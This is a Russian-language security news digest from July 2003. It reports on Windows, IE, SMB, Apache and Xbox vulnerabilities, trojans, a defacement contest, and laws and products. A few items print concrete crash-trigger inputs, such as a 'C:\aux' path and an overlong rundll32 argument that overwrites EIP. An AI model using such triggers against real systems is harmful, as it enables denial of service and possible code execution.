Больше половины предлагаемых в интернете услуг, оплата за которые осуществляется через электронные системы, являются мошенничеством. Об этом сообщил на состоявшейся на этой неделе пресс-конференции начальник Первой оперативно-розыскной части криминальной милиции ГУВД Москвы Дмитрий Чепчугов. Только за прошлый год российские хакеры похитили со счетов различных фирм, в том числе и иностранных, до $450 млн. Однако банкиры с мнением представителя ГУВД не согласны. Они считают, что совершить махинацию в сфере электронной торговли, используя платеж по кредитной карте через банк, практически невозможно. Словом, отечественные банкиры считают, что страшные цифры, озвученные представителями ГУВД, скорее характерны для западной электронной торговли, чем для российской. Согласно отчету американского ФБР, в 2002 году в мире резко возросло количество случаев мошенничества в интернете: поступило более 48 тысяч жалоб от пострадавших - в 3 раза больше, чем год назад. Самое большое количество жалоб - 46% - связано с мошенничеством на интернет-аукционах: сюда относятся случаи, когда купленный товар не доставляется покупателю, совершаются махинации с кредитной карточкой или фальсифицируется поступление денег. Источник - http://www.RBCdaily.ru/
11/07/2003 12:30 Symbol Technologies представила защищенный мобильный компьютер с поддержкой Wi-Fi
Компания Symbol Technologies, производитель мобильных решений для предприятий, выпустила защищенный полнофункциональный карманный компьютер, объединяющий передовые визуальные функции, функции голосовой связи по сетям Wi-Fi и поддержку системы беспроводной локальной сети Spectrum24. Symbol PDT 8146 Imaging Computer расчитан на сотрудников фирм, работающих в сферах транспорта и логистики, почты и доставки посылок, общественной безопасности, распространения продуктов и услуг, розничной торговли. Устройство оснащено цветным экраном высокого разрешения, 32-разрядным процессором Intel XScale, отсоединяемой клавиатурой с подсветкой, литиево-ионной батареей, работает под управлением ОС Microsoft Pocket PC Premium Edition. Symbol PDT 8146 Imaging Computer содержит новый механизм ввода изображений Symbol, который при размере в пятую часть кубического дюйма (3,28 см³) представляет собой миниатюрную систему считывания штрихкода. Датчик на ПЗС с технологией Smart Focus сочетается в ней с лазерной системой наведения и автоматической подсветки. Устройство также поддерживает голосовую связь в сетях Wi-Fi, содержит сопроцессор цифровой обработки сигналов (DSP). Источник - http://www.cnews.ru
11/07/2003 12:09 DoS при обращении к DOS-устройствам в Microsoft Internet Explorer.
Fabian Becker из Германии сообщает об обнаружении очередной уязвимости в броузере IE. При вводе в поле адреса следующего URL - С:\aux происходит замораживание окна с IE. Уязвимость проверялась на IE6 в WinXP со всеми сервис-паками. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-07/0094.html
11/07/2003 11:16 Назван победитель "хакерского" соревнования.
Организаторы соревнования хакеров по дефейсу, который состоялся в минувшее воскресенье и наделавший много шуму в среде далёких от компьютерного мира журналистов и органов МВД (см. наши предыдущие новости), объявили результаты конкурса по дефейсу (что, честно говоря, далеко от хакерства). Победителем признана бразильская команда "Perect.br", набравшая 152 очка, что в 2 раза больше, чем у ближайших преследователей. Идущие на втором и третьем месте команды hackbsd crew и iskorpitx набрали, соответственно 62 и 52 очка. Однако, выражется сомнение в достоверности подобных результатов, поскольку сайт Вэб-сайт Zone-H, который фиксировал результаты соревнований, сам был подвергнут DoS-атаке. По предварительным подсчетам, в ходе турнира были взломаны 500-600 небольших сайтов, тогда как количество взломов в обычные дни часто достигает двух-трех тысяч и без каких бы то ни было состязаний. Кроме того, такой вид взлома как замена главных страниц , не наносит серьезного ущерба информационным системам и явно не заслуживает уделяемого ему огромного внимания. Результаты - http://defacers-challenge.com/
10/07/2003 20:09 Использование RBAC и SSH в Solaris.
В статье "Role Based Access Control and Secure Shell" рассказано как использовать RBAC для более гибкого управления доступом в Solaris. Статья в PDF формате. Взято с opennet.ru. Cтатья - http://www.sun.com/solutions/blueprints/0603/817-3062.html
10/07/2003 18:02 Уязвимость в SMB-пакетах Windows.
Уязвимость обнаружена в обработке параметров SMB пакетов. Удаленный атакующий может выполнить произвольный код на целевой системе. Server Message Block (SMB) – интернет протокол, который позволяет Windows пользователям открывать общий доступ к файлам, принтерам, серийными портам и связываться между компьютерами, используя именованные каналы и почтовые сегменты (mail slots). Недостаток обнаружен в пути, которым сервер проверяет правильность параметров SMB пакетов. Когда система клиента посылает SMB пакет к серверной системе, он включает определенные параметры, которые содержат набор “инструкций” для сервера. В этом случае сервер не проверяет правильность длины буфера, установленного пакетом. Если длина буфера, определенная клиентом меньше, чем необходимо, произойдет переполнение буфера. Атакующий может сконструировать специально обработанный SMB пакет, чтобы переполнить буфер на сервере. В результате может нарушиться целостность данных, работа системы может аварийно завершиться или атакующий может выполнить произвольный код на сервере. Для эксплуатации этой уязвимости атакующий должен быть предварительно авторизован на сервере. Уязвимость обнаружена в Windows NT Server 4.0/XP/2000. Подробности - http://securitylab.ru/default.asp?ID=38783
10/07/2003 17:39 Подробности уязвимости в именованных каналах в Windows 2000 и MS SQL Server 2000.
Уязвимость обнаружена в в именованных каналах в Windows 2000. Локальный пользователь может получить SYSTEM привилегии. Определяя имя именованного канала, вместо файла, в качестве аргумента к расширенной сохраненной процедуре SQL Server xp_fileexist, пользователь может выполнить произвольный код с привилегиями SQL сервера. Это происходит из-за неправильного поведения системного вызова CreateFile и заимствование прав именных каналов в Windows. Уязвимость не ограничена SQL сервером, другие программы могут быть также уязвимы. API вызов CreateFile используется для открытия и/или создания файлов, именованных каналов, почтовых слотов и много чего еще. В вызове не существует механизма ограничения открываемых ресурсов. Большинство WIN32 сервисов выполняются под local system учетной записью и, так или иначе, обращаются к файлам. Если существует возможность определить, какой файл откроет специфическая служба, то можно выполнить роль учетной записи, под которой запущена эта служба. Подробности - http://securitylab.ru/default.asp?ID=38787
10/07/2003 16:56 Во Франции арестован хакер, взломавший более 2000 сайтов.
17-летний хакер, взломавший более 2000 правительственных и военных интернет-сайтов по всему миру, был арестован в окрестностях Парижа в конце июня и отпущен на свободу под присмотр суда. Как сообщает France-Presse со ссылкой на жандармерию Лилля, юный ученик лицея, действовавший под кличкой "DKD", стирал главные страницы сайтов и оставлял на них послания политического характера. Например, в защиту палестинского государства или против действий американского правительства. Арест юного хакера был проведен 23 июня в доме его родителей специалистами по борьбе с киберпреступностью по наводке местной префектуры, чей сайт также был взломан вундеркиндом. В ходе изучения компьютера хакера выяснилось, что молодой человек взломал свыше 2000 сайтов, из которых большая часть принадлежали ведомствам Франции, Великобритании, Австралии и Соединенных Штатов. Среди "военных трофеев" юноши числится, в частности, взломанный сайт американских ВМС, рассказали в жандармерии. После установления виновности хакер был отпущен на свободу под надзор суда. В данный момент ему строжайше запрещено подключаться к Сети и пользоваться компьютером. Источник - http://www.compulenta.ru
10/07/2003 16:34 В Apache исправлены ещё четыре уязвимости.
В понедельник была выпущена новая версия веб-сервера Apache. В Apache 2.0.47 добавлены заплатки для ряда уязвимостей, обнаруженных ранее. Дыры в веб-сервере делали его более уязвимым для DoS-атак. Одна из четырех обнаруженных уязвимостей связана с директивой SSLCipherSuite, использующейся для перехода на более стойкое к взлому шифрование. В результате, вместо стойкого алгоритма может использоваться более слабый. Другая уязвимость связана с функцией accept(). Третья исправленная уязвимость может проявиться при работе по протоколу IPv6. Четвёртая уязвимость срабатывает, когда сервер пытается обработать чрезмерное количество внутренних переадресаций и вложенных подзапросов. Не справившись с этим, сервер попадает в бесконечный цикл. Подробности - http://www.apache.org/dist/httpd/Announcement2.html
10/07/2003 16:21 "Информзащита" пополнила портфель сертификатов ФАПСИ.
Компания "Информзащита" получила сертификаты ФАПСИ №№ СФ/022-0646 и СФ/022-0645 на два модернизированных продукта: средство криптографической защиты информации (СКЗИ) М-506А и СКЗИ М-507А. Оба средства являются доработанными в соответствии с новыми требованиями версиями СКЗИ М-506 и М-507, которые широко применяются для криптографической защиты информации в сетях, обрабатывающих государственную тайну. Сертификаты подтверждают, что оба комплекса соответствуют требованиям ГОСТ 28147-89 и требованиям ФАПСИ к СКЗИ класса КАИ-2.03. СКЗИ М-506А реализовано на основе системы защиты информации Secret Net, разработанной компанией, и обеспечивает в дополнение к защите от несанкционированного доступа возможность криптографической защиты данных, хранящихся на жестком диске и передаваемых по локальной сети. СКЗИ М-507А функционирует совместно с изделием М-506А и позволяет создавать системы, которые обеспечивают защищенную передачу информации, составляющей государственную тайну, по открытым каналам связи. Источник - http://www.cnews.ru
10/07/2003 15:48 Антивирус для Exchange Server 2003.
Компания Panda Software заявила о выпуске новой версии Panda Antivirus for Exchange Server с поддержкой Microsoft Exchange Server 2003. Новое антивирусное решение предлагает для почтовой платформы Microsoft Exchange Server 2003 защиту всего входящего и исходящего трафика в режиме реального времени от вирусов любых типов и других вредоносных кодов. «Благодаря тесному сотрудничеству компаний Microsoft и Panda Software, а также технологическим усовершенствованиям в Exchange 2003, которые значительно повышают уровень безопасности пользователей, Panda Antivirus for Exchange Server поднимет антивирусную защиту предприятий на более высокий уровень», – говорит Кевин МакКуисчен (Kevin McCuistion), руководитель отдела маркетинга Exchange корпорации Microsoft. Panda Antivirus for Exchange Server разработан на базе самой современной версии интерфейса VirusScanning API 2.5, что обеспечивает тесную интеграцию антивируса с платформой Microsoft Exchange 2003. В число новых функций Panda Antivirus for Exchange Server входят защита всех входящих и исходящих сообщений, проходящих через платформу Exchange 2003, в реальном времени, даже в случае использования сервера в качестве SMTP шлюза. Panda Antivirus for Exchange Server также включает новую версию антивирусного движка Panda Software, способного обнаружить и блокировать вредоносные сообщения, которые проникают в систему, используя дыры в неправильно сконфигурированных почтовых клиентах. Источник - http://www.viruslab.ru
10/07/2003 15:03 Три новых Security Bulletin от Microsoft.
Как пишет "Лаборатория касперского", Заплатки" для продуктов Microsoft предпочитают появляться стаями. Вот их еще нет - а вот их уже толпа. Примерно так случилось и в эту среду: целых три новых патча, устраняющих две важных и одну критическую ошибку в защите операционных систем семейства Windows. Первый патч, MS03-023 (кстати, не можем не порадоваться прозорливости автора названий для Security Bulletin, предусмотревшего аж три разряда в обозначении порядкового номера), устраняет критическую "дыру" во встроенном в ОС Windows конвертере файлов в HTML, позволявшую запускать на компьютере любой код, на выбор атакующего. Ошибка присутствует во всех поддерживаемых сегодня операционных системах Microsoft: от Windows 98 до Windows Server 2003. Второй патч, MS03-024, предназначен для "заделки" уязвимости в SMB (Server Message Block), позволявшей в худшем случае, опять же, запускать на атакуемом компьютере программы на усмотрение атакующего. Уязвимость затрагивает Windows NT Server 4.0, Windows 2000 и Windows XP Professional. Windows Server 2003 беда на этот раз миновала. Наконец, последний Security Bulletin, MS03-025, описывает ошибку в опциях Accessibility в Windows 2000, позволявшую атакующему повышать уровень своих привилегий на компьютере. Ошибку нельзя использовать удаленно, через сеть, но только имея непосредственный контакт с компьютером, что, в сумме с очень незначительным числом подверженных ей операционных систем, и определяет ее невысокую степень опасности. MS03-023 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-023.asp MS03-024 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-024.asp MS03-025 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-025.asp
10/07/2003 14:40 К 2002 году музыкальные пираты продали во всем мире 1 миллиард компакт-дисков.
Международная Федерация производителей фонограмм (IFPI) опубликовала отчет о состоянии мирового рынка пиратской музыкальной продукции, сообщает сайт BBC News. По данным этой организации, его объем сейчас составляет 4,6 миллиарда долларов. В отчете указывается, что из каждых пяти дисков или кассет, продаваемых в мире, два будут являться контрафактными. Такое положение привело к тому, что рубеж в миллиард проданных дисков пираты взяли еще в 2002 году. По мнению экспертов IFPI, большая часть зарабатываемых таким образом денег достается организованным преступным группировкам, и понимание этого должно рассеять иллюзию будто музыкальное пиратство - это "бескровное преступление". Однако одновременно с ростом объемов продаж незаконно произведенных дисков, говорится в отчете, растет число конфискаций пиратской продукции и оборудования для ее изготовления. Так, общая стоимость перехваченных в 2002 году контрафактных дисков составила 50 миллионов долларов, что в четыре раза больше чем в предыдущем году. Подробнее - http://www.lenta.ru/internet/2003/07/10/illegal/
9/07/2003 14:31 К концу года должен начать работу домен .УА.
Работу по открытию кириллических доменных зон вели совместными усилиями представители России, Украины и Болгарии. Вслед за россиянами, уже регистрирующими имена в зоне .РУ, свой домен должны запустить в техническую эксплуатацию украинцы. Об этом стало известно из официального пресс-релиза компании iName.com.ua, распространенного накануне. Данная компания представляет интересы украинской стороны в MINC и является наиболее активным сторонником идеи запуска зоны .УА в эксплуатацию. Как стало нам известно от представителей iName.com.ua, в данный момент ведутся заключительные работы по регистрации организации, которая будет заниматься администрированием зоны .УА. Как считает Любомир Гайдамака, генеральный директор iName.com.ua, новой зоне предстоит пройти еще длительный путь становления, тем не менее, интерес к ней со стороны пользователей наблюдается уже сейчас. Источник - http://www.runet.ru
9/07/2003 13:30 Беспечные пользователи PDA — угроза безопасности компаний.
Чем больше людей использует PDA для хранения деловых данных, тем больше проблем у корпораций — таков вывод второго ежегодного исследования PDA Usage Survey. Миллиарды фунтов, которые компании ежегодно тратят на безопасность, благополучно вылетают в трубу: всю эту защиту очень легко обойти, так как многие сотрудники оставляют незащищенные пароли и корпоративные данные в своих устройствах. Второе ежегодное исследование PDA Usage Survey, выполненное по заказу Pointsec Mobile Technologies, обнаружило, что каждый третий владелец PDA хранит в нем рабочие пароли и PIN-номера банкоматов, не защищая при этом доступ к своему PDA на случай кражи или утери устройства. Исследование показало также, что за прошедший год роль PDA изменилась. Если в 2002 году их главным назначением было использование в качестве персонального органайзера, то теперь эти устройства применяются главным образом для ведения бизнес-дневника. Управляющий директор Pointsec Магнус Олберг озабочен тем, что пользователи PDA не думают о «серьезных последствиях», возникающих в случае утери или кражи устройства. «Если PDA не защищен шифром и паролем, информацию из него можно синхронизировать за считанные секунды. А благодаря развитию беспроводной технологии конкурент или хакер может получить прямой доступ к корпоративной сети, сидя в кафе или баре рядом с вашим офисом», — предупреждает он в своем заявлении. Подробности - http://www.zdnet.ru/?ID=303401
9/07/2003 12:24 Компания упростила шифрование e-mail.
Молодая компания разработала ПО шифрования электронной почты, которое эффективно работает при его использовании одним из участников обмена корреспонденцией. Компания из Пало-Альто старается добиться того, чтобы больше людей шифровало свою электронную почту. Система шифрования e-mail Voltage Security представляет собой несколько необычный вариант существующей практики использования для шифрования и дешифрования сообщений комбинации из двух криптографических ключей — открытого и частного. При подходе Voltage так называемый открытый ключ получают из адреса e-mail отправителя, что исключает из процесса один из шагов. «Вам не приходится проходить процедуру получения сертификата безопасности», — пояснил генеральный директор Voltage Сатвик Кришнамурти. Той же степени защиты можно достичь и с применением существующих систем аутентификации с открытым ключом, однако Voltage утверждает, что простота ее ПО может привлечь предприятия, которые заинтересованы в повышении надежности системы e-mail, но не решаются на установку системы шифрования из-за ее сложности. Идея использования личных данных в качестве основы открытого ключа не нова. В 1984 году такой подход предложил пионер шифрования с открытым ключом Ади Шамир. В 2000 году два профессора — Дэн Боне и Мэтт Франклин — опубликовали работу по математическим основам такого подхода. Боне и другие основали Voltage для коммерциализации ПО, использующего их метод. Компания, в которой сейчас 20 сотрудников, финансируется фирмами Morgenthaler и Hummer Winblad. Результатом усилий Voltage стала программа, исключающая потребность в каких-либо предварительных действиях для обмена шифрованными сообщениями. По словам Кришнамурти, программа компании должна быть только у отправителя e-mail. Получатель может автоматически расшифровать сообщение, пользуясь Outlook, Outlook Express, Eudora и даже карманным ПК BlackBerry. Опытная версия ПО предназначена для IBM Lotus Notes. Подробности - http://news.zdnet.co.uk/story/0,,t269-s2137219,00.html
7/07/2003 22:06 Троянская программа JS.Fortnight.C.
Компания Symantec предупреждает о появлении новой троянской программы JS.Fortnight.C. Она представляет опасность для пользователей почтового клиента Outlook Express, так и не установивших заплатку, которая устраняет известную уязвимость при обработке тэгов IFRAME. При запуске троян помещает специальный код в качестве подписи ко всем исходящим письмам, что позволяет ему распространяться по электронной почте. Когда пользователь открывает письмо в Outlook Express, его браузер перенаправляется на сайт, который принадлежит автору трояна. На этой странице содержится вредоносный код, меняющий некоторые установки браузера и записи в системном реестре Windows. Источник - http://www.compulenta.ru
7/07/2003 21:34 Троян W32.Bambo ворует WebMoney.
Троянская программа W32.Bambo предназначена для кражи информации с компьютера пользователя. Как сообщает компания Symantec, будучи активирован, троян пытается блокировать работу популярных антивирусов и брандмауэров, а также программ, позволяющих редактировать системный реестр. В реестр троян помещает записи для своей автоматической активации. Затем троян начинает регистрировать все данные, вводимые с клавиатуры, информацию, передаваемую через буфер обмена и файлы с расширениями .kwm и .pwm, которые используются программой WebMoney Keeper, предназначенной для доступа к онлайновой платежной системе WebMoney. Источник - http://www.symantec.com
7/07/2003 20:37 Президент подписал федеральный закон "О связи".
Президент РФ Владимир Путин подписал федеральный закон "О связи". Как сообщает пресс-служба главы государства, закон устанавливает правовые основы деятельности в области связи на территории РФ и на территориях, находящихся под юрисдикцией России, определяет полномочия органов госвласти в области связи, а также права и обязанности лиц, участвующих в указанной деятельности. В соответствии с законом, все операторы связи вправе на возмездной основе размещать кабели связи в линейно-кабельных сооружениях связи вне зависимости от принадлежности этих сооружений. Особенности порядка госрегистрации на линейно-кабельные сооружения связи устанавливаются правительством РФ. В законе прописан статус технологических сетей связи, которые могут иметь присоединение к технологическим сетям связи зарубежных компаний только для обеспечения единого технологического цикла. Споры между операторами связи по вопросам заключения договоров о присоединении рассматриваются в судебном порядке. Согласно документу, правительство определяет порядок распределения и использования ресурсов единой сети электросвязи РФ. Процедура лицензирования деятельности в области связи предусматривает судебный порядок аннулирования лицензий. Кроме того, впервые в законе вводится глава "Универсальные услуги связи", в соответствии с которой в каждом населенном пункте должен быть установлен как минимум один таксофон, а там, где проживают не менее 500 человек, организован как минимум один пункт коллективного доступа к сети интернет. Оплата местных телефонных соединений может производиться по выбору абонента-гражданина с применением либо абонентской, либо повременной системы оплаты. Источник - http://www.cnews.ru
7/07/2003 19:22 Очередная уязвимость в Windows.
Rick Patel cообщает о наличии возможности переполнения буфера при передаче большой строки в качестве имени подпрограммы модуля при запуске этого модуля посредством стандартной программы Windows rundll32.exe. В качестве примера автор приводит следующий вариант: rundll32.exe advpack32.dll,<'A'x499>. Автор тестировал уязвимость на ОС WinXP SP1, но выражает сомнение в отсутствии уязвимости в других версиях ОС Windows. advpack.dll приведён в качестве примера - любые другие выполнимые файлы и модули также могут вызвать нарушение функционирования. При этом регистр EIP получает значение 00410041. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-07/0052.html
7/07/2003 18:37 Недельный отчет о вирусах Panda Software.
Опубликован традиционный еженедельный отчёт о вирусах компании Panda Software. В этом отчёте рассматриваются 3 червя: Klexe, Scorvan и MyLife.M. Опасность Klexe заключается в том, что после заражения он оставляет на компьютере жертвы трояна, который похищает конфиденциальную информацию пользователя и отправляет ее на специальный адрес электронной почты. Процесс заражения происходит следующим образом: - на электронный ящик пользователя приходит письмо со ссылкой на веб страницу, где ему предлагается скачать карту e-Messenger; - после открытия данной страницы на компьютер пользователя загружаются два файла: 'ECMSETUP1.EXE' (содержит код червя, рассылающего электронные письма) и 'KL.EXE' (троян). Последний файл копируется под именем 'WINDOWS EXPLORER.EXE' в директории загрузки (startup directories) дисков, к которым червь может получить доступ (C:, D:, E: и F:). Этим он обеспечивает себе запуск при каждой перезагрузке компьютера. При попадании червя на компьютер пользователя, на экране монитора появляется сообщение об ошибке, после чего Klexe рассылает копию зараженного письма по всем адресам, найденным в адресной книге Outlook. Второй червь, Scorvan, распространяется в «peer-to-peer» (p2p) сетях обмена файлами KMD, Morpheus, Limewire, Grokster, Bearshare, Edonkey2002 и KaZaA. После проникновения на компьютер жертвы Scorvan запускает калькулятор Windows, а когда пользователь закрывает его, червь становится резидентом. Scorvan создает многочисленные копии самого себя в следующих каталогах: «morpheus\\my shared folder\\», «\\bearshare\\shared\\», «\\edonkey2002\\incoming\\» и др. Имена зараженных файлов состоят из двух частей: первую червь выбирает из специального списка, а вторая представляет собой «calculator.exe» или «calc.exe». Вирус Mylife.M, распространяющимся по электронной почте в письме с темой, посвященной актрисе Джулии Робертс (Julia Roberts) или певице Шакире (Shakira). Червь рассылает себя по всем адресам, найденным в адресной книге Windows. При запуске червь Mylife.M имитирует открытие медиаплеера. Источник - http://www.viruslab.ru
7/07/2003 18:15 Новая версия драйвера NVIDIA для FreeBSD.
Как сообщается на linux.org.ru, доступна версия 1.0-4365 драйвера под FreeBSD. Теперь с поддержкой как -STABLE, так и -CURRENT веток. (Вроде бы, я слышал, люди и раньше на -CURRENT ставили, но официально не поддерживалось). Ставить можно из порта x11/nvidia-driver после cvsup-а. Подробности - http://www.nvidia.com/view.asp?IO=freebsd_1.0-4365
7/07/2003 18:11 Rambler будет бороться со спамом законодательно.
Осенью холдинг планирует представить в Государственной Думе законопроекты, ставящие рассылку спама вне закона. Об этом заместитель генерального директора "Рамблера" Иван Засурский заявил на страницах газеты "Ведомости". По информации "Рамблера", спам занимает в России до 75% почтового трафика. Этот показатель будет увеличиваться, поскольку спам - самый дешевый способ рекламирования товаров и услуг, а надежного технического решения проблемы не существует, - считают в холдинге. Одновременно с законодательной инициативой "Рамблер" подаст в суд на самых злостных спамеров, сообщает "Компьюлента". "Мы искренне советуем им "убивать" почтовые адреса на "Рамблере" из общих баз, потому что до начала кампании осталось два месяца, и жертв судебного преследования мы выберем из их числа", - отметил г-н Засурский. Правда пока остается тайной, какие конкретно меры по борьбе со спамерами холдинг вынесет на рассмотрение в Думу. Источник - http://www.vedomosti.ru/
7/07/2003 16:38 Конкурс веб-вандалов, похоже, закончился пшиком.
В воскресенье — в день, на который интернет-вандалы якобы планировали конкурс онлайновых граффити, — группа неизвестных вывела из строя сервер крупнейшего регистратора нападений на веб-сайты. В результате атаки сайт Zone-H.org был практически недоступен до позднего вечера воскресенья, поэтому о результатах конкурса в целом судить трудно. Zone-H.org зарегистрировал около 500 интернет-адресов, относящихся к выведенным из строя веб-сайтам, но из-за перебоев с доступом к самому регистратору реальная цифра может оказаться в несколько раз большей. «Мы узнаем это в течение следующих 36 часов», — заверил основатель и редактор Zone-H Роберто Претони в чате с CNET News.com. Известие о конкурсе стремительно распространилось в конце прошлой неделе после публикации секьюрити-фирмы Internet Security Systems. На веб-сайте под названием Defacers' Challenge утверждалось, что в воскресенье онлайновые вандалы постараются взломать как можно больше веб-сайтов и сообщить о своих достижениях нейтральному регистратору Zone-H. Претони ожидал в этот день от 20 до 30 тыс. сообщений о взломанных сайтах, но их оказалось гораздо меньше. Слабая реакция, отчасти объясняемая тем, что взломщики испытывали трудности при попытках связаться с Zone-H, возможно, указывает и на то, что опасность была сильно преувеличена. Zone-H.org известен главным образом своей базой данных покушений на веб-сайты, которая и была выведена из строя. Претони пришлось открыть альтернативную страницу для приема сообщений в процессе конкурса. Обычно по воскресеньям веб-сайт регистрирует от 1000 до 3000 взломов веб-сайтов. Из-за проблем Zone-H.org ответственный за проведение конкурса — некто Eleonora(67) — продлил его еще на 24 часа. Источник - http://www.zdnet.ru
6/07/2003 21:13 В Украине вводится уголовная ответственность за распространение компьютерных вирусов.
С 4 июля в Украине вводится уголовная ответственность за незаконное вмешательство в работу компьютеров и компьютерных сетей, а также распространение компьютерных вирусов, которое привело к искажению, исчезновению, блокированию информации или ее носителей. Закон Украины о внесении изменений в Уголовный кодекс Украины относительно ответственности за незаконное вмешательство в работу сетей электросвязи был принят Радой 5 июня и сегодня вступает в силу. Законом предусмотрено, что минимальным наказанием за данные правонарушения является штраф в размере до 70 необлагаемых налогом минимумов доходов граждан, а максимальным - лишение свободы сроком до 5 лет. Законом Службе безопасности Украины предоставлено право расследовать преступления, предусмотренные ст. 361, 362, 363 и связанные с использованием компьютеров и компьютерных сетей, которые ранее находились в ведении следователей Министерства внутренних дел. Источник - http://www.sysadmins.ru
6/07/2003 20:43 Сайт Ватикана ежедневно пытаются взломать до 30 хакеров.
Аргумент «хакер – это библейский Давид» развенчать гораздо проще, в особенности, если придерживаться мнения, что цель не оправдывает средства. В любом случае разница между атакой в целях публичной демонстрации того, как легко получить конфиденциальную медицинскую информацию о пациенте, и атакой в целях кражи схемы нового прибора весьма существенна. Компьютерные атаки происходят каждый день. Современные киберпреступники готовы посягнуть даже на Папу Римского. Так, представители Ватикана сообщили, что им пришлось нанять команду экспертов по компьютерной безопасности для защиты своего сайта, который ежемесячно атакуют более 10 тысяч вирусов. А ежедневно ресурс пытаются взломать до 30 хакеров. "К счастью, благодаря высокоэффективной защите, до сих пор никто так и не сумел взломать сайт Папы Римского, — сообщил секретарь церкви Арчбишоп Клаудио Селли. — Молодые американцы, пытающиеся пересечь ватиканскую e-границу, — самые агрессивные хакеры в мире". Сам Иоанн Павел II неоднократно высказывался в поддержку Интернета, но из соображений безопасности не имеет личного адреса электронной почты. Первый сайт Ватикана был открыт на Рождество 1995 года и обошёлся в $60 тысяч. Он был предназначен, главным образом, для обслуживания журналистов, информирующих общественность о деятельности церкви. Новый сайт на пяти языках обошёлся уже в $575 тысяч, его посещают 50 миллионов пользователей из 150 стран. Источник - http://www.crime-research.org
6/07/2003 20:39 Два американца создали интернет-систему слежения за госчиновниками.
Обеспокоенные созданием новой правительственной системы тотального слежения TIA (Total Information Awareness, служба Тотального информационного мониторинга), двое ученых из Массачусетского технологического института разработали новый интернет-сервис, позволяющий вести досье на государственных чиновников, сообщает газета The Boston Globe. Первоначально, на открывшемся 4 июля, в День независимости, сервере opengov.media.mit.edu будет опубликована общая информация о чиновниках. Затем любой пользователь сети сможет добавлять к этой информации известные ему сведения, результаты наблюдений за официальными лицами. Причем достоверность публикуемой информации проверяться не будет. По словам одного из создателей, новый сервис - что-то наподобие гражданской службы разведки. Новая служба получила название Службы мониторинга действий правительства (Government Information Awareness, GIA). Создание этого сервера стало своеобразным ответом TIA, рассекреченной в прошлом году системе, задача которой - изучение больших объемов информации о гражданах США, таких как правительственные базы данных, в том числе данных о кредитных картах, с целью выявления возможных террористических групп Подробности - http://www.lenta.ru/internet/2003/07/06/tables/
6/07/2003 20:15 "Чемпионат мира" по дефейсу среди хакеров пока не принёс никаких новостей.
Ранее сообщалось о планирующихся на сегодняшний день массовых дефейсах серверов по всему миру в рамках проводимого среди хакеров соревнования под названием Defacers Challenge (www.defacers-challenge.com). Как свидетельствует НТВ, пока не известно, на какое время намечен «час икс». Однако специалисты уверены, что до массированной атаки на «всемирную паутину» остаются считанные часы. Эксперты ФБР предупреждают: ожидается свыше двадцати тысяч попыток вывести из строя серверы крупнейших компаний, банков, военных организаций и даже правительств. Не исключено, что на некоторое время Интернет может «зависнуть» во всем мире. ГУВД Москвы рекомендует российским пользователям в это воскресенье не подключаться к Интернету без особой необходимости. По НТВ с очередными страшилками о грядущем "Апокалипсисе" (нарушении функционирования Интернет) выступил господин Касперский в вечернем выпуске новостей. :) Источник - http://www.ntv.ru
6/07/2003 16:09 Уязвимость в MacOSX?
Довольно странное письмо появилось в BUGTRAQ. Автор, Delfim Machado, из Португалии, утверждает, что можно разблокировать сохранятель экрана (Скрин-сэйвер) без ввода пароля. Как пишет сам автор, он точно не знает, сколько символов необходимо ввести, однако, если поставить что-нибудь на клавишу клавиатуры (чтобы получить постосянный ввод символа) и сделать паузу в приблизительно 5 минут и затем нажать клавишу Enter - ПРоизойдёт разблокирование экрана. Автор проверял подобную "особенность" в системе Darwin MacLulo 6.6 Darwin Kernel Version 6.6. Appale пока никак не прореагировала на письмо. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-07/0034.html
6/07/2003 15:04 Про узявимость в Xbox.
Вчера мы сообщали о том, что якобы группе Free-X удалось взломать защиту Xbox, которая довольно успешно продвигается Microsoft На рынке игровых устройств. 4 июля вышло описание подобной уязвимости от имени Стефана Эссера (Stefan Esser) из Германии. Он утверждает, что можно взломать систему защиты Xbox, используя некорректную обработку файлов ПО Dashboard, которое фактически является сердцем Xbox и появляется после включения приставки, если в дисковод не вставлен диск DVD. Позволяет производить конфигурирование системы и многие важные системные настройки. По сути, взлом XBOX Dashboard позволяет получить полный контроль над системой и избежать системы цифровой подписи, на которой, собственно, и построена вся система безопасности приставки. Как пишет автор, все файлы при их запуске и обращении к ним проверяют хэшированное значение SHA1 оных, которое содержится внутри системы. Однако, по некоторой причине, подобная проверка не производится в отношении аудио-файлов (.wav) и файлов шрифтов (.xtf). Создав специальный "неправильный" файл шрифтов, автор показал возможность переполнения буфера в загрцзчике шрифтов с последующим выполнением произвольного кода в системе, что, по сути, означает обход системы цировой подписи Microsoft и возможности загрузки произвольного кода без перепрошивки мод-чипа (в частности, пиратских дисков, с чем так упорно борется M$). Написанный автором эксплоит позволяет всего лишь навсего загрузить в игровую приставку загрузчик Linux! ;)) Хотелось бы напосмнить, что генеральный директор фирмы Lindows обещал 100 тыс. $ тому, кто сможет загрузить на консоли Xbox Linux без модификации аппаратуры (читай - перепрошивки мод-чипа). Кроме того, в самом описании приводится довольно интересный FAQ по приставке Xbox. Хотелось бы заметить, что заархивированный исходник эксплоита ещё и закодирован в BASE-64. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-07/0035.html
6/07/2003 14:00 Новая рассылка по безопасности на subscribe.ru
На сервере рассылок subscribe.ru открылась ещё одна русскоязычная рассылка, посвящённая рассмотрению вопросов безопасности в мире открытых (читайте, *NIX-систем). Подписка организована SHuRuP-ом, ведущим сайт www.nixp.ru. Периодичность - 1 раз в неделю. Подписаться - http://www.nixp.ru/cgi-bin/go.pl?q=mail
5/07/2003 17:51 Хакеры предлагают «крышу» Microsoft.
